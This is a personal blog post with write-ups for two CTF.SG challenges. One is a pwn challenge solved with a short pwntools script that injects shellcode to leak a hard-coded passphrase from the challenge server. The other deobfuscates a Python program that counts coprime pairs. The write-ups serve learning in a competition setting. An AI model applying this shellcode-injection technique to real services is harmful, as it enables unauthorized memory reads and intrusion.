1 week, 1 CTF, 3 weeks straight. These CTFs just keep coming, don’t they?
Interestingly the three CTFs were also arranged in order of increasing perceived difficulty, which was nice but also terrible at the same time because I had some trouble pulling my weight in this particular CTF in terms of points.
The CTF.SG CTF is the first open CTF event hosted by the CTF.SG team in Singapore, and was DEFINITELY not catered towards JC students. :P
Nevertheless, (not) my (usual) team managed to achieve a respectable 2nd place in this CTF!
Writeups
Below are some of my writeups for this CTF:
XMM
Help Kenneth get the xmm!
Disclaimer
This challenge was done after the CTF because ariana too fast.
Reconnaissance
We are greeted by a binary with the following checksecs:
,does the following:
and has two interesting functions:
This one checks for some kind of constant passphrase, which is stored here:
So the challenge seems pretty straightforward which was probably why it was blitzed.
Vulnerability analysis
- Passphrase is evidently not randomised.
- Opens up the possibility of a leak.
mmap64()basically gives us a huge area with which to write arbitrary shellcode.- We can leak passphrase with some (hopefully not painful) shellcoding.
answer()prints flag.- So we’re going there.
Script
There is honestly not much else to say. This challenge is pretty straightforward and I can probably only fault myself for not having opened it at all.
from pwn import *
context.log_level='DEBUG'
r = remote('chals.ctf.sg', 20401)
r.recvuntil("┃ ┃ ")
r.sendline("newfonewhodis")
r.sendline(asm(shellcraft.write(1,0x49501d,13)))
string=r.recvall()[:-13]
r = remote('chals.ctf.sg', 20401)
r.recvuntil("┃ ┃ ")
r.sendline(string)
And thus we receive the flag:
CTFSG{xmm_hunter_1337}
… What a creepy challenge.
Fourpass
This is my response to a certain telco’s OnePass. I call it “Fourpass” (because it takes *four* inputs instead of *one*). I don’t think it’ll get accepted because it is so slow though...
Reconnaissance
We are given what appears to be a token, which I surmised to be some kind of binary. Until…
… That was pretty dumb.
Now that we’ve ascertained that the file is just Python code, we will simply beautify and rewrite said code:
#!/usr/bin/python3.8
a, b, c, d = list(map(int, input().split()))
gcd=lambda f: lambda x,y: x if not y else f(y,x%y)
print(
sum( # Sums them up???
filter(
lambda x: x==1,
# Finds all values within here that are 1.
map(
# x below is val_1 and val_2 as a tuple.
lambda x:(lambda f:(lambda z:z(z))(lambda z:f(lambda *y: z(z)(*y))))
# z(z) is recursion.
(gcd)(*x),
# Again, val_1,val_2 (something)(gcd(f,x))
[(val_1, val_2) for val_1 in range(a, b) for val_2 in range(c, d)]
# All possible tuples of f and x.
)
)
)
)# Verdict: We count the number of coprime tuples in a<=val_1<b,c<=val_2<d
And thus we make the following deductions:
gcdis well… gcd. (Extracted from that ugly thing in the middle.)- Iterating through some set of tuples, we are retrieving the gcd… and?
lambda z: z(z)must be recursion. Unexpected linguistics.- As I have already annotated above, the program counts the number of coprime tuples in
a<=val_1<b,c<=val_2<d.- This is not difficult to see as we can rewrite the whole function inside the
map()as:print(sum(filter(lambda x: x==1,map(gcd,[(val_1, val_2) for val_1 in range(a, b) for val_2 in range(c, d)]))))
- This is not difficult to see as we can rewrite the whole function inside the
However, this is not the main challenge, sadly for me.
The Real Challenge: nc chals.ctf.sg 15201
Where I REALLY got stuck was this part, where you receive enormous numbers and this happens:
The existing program was too inefficient to actually do its job in this particular context.
Naturally, seeing a pattern, I was inclined to think of it as a problem involving Euler's Totient Function.
But ariana finished up with his challenge and shifted his attention to this particular challenge.
That was very good for me since I can’t function at night.
See his writeup here.
… And then I woke up to the flag!
Flag: CTFSG{c_4_c0pR1me_Int3geRs}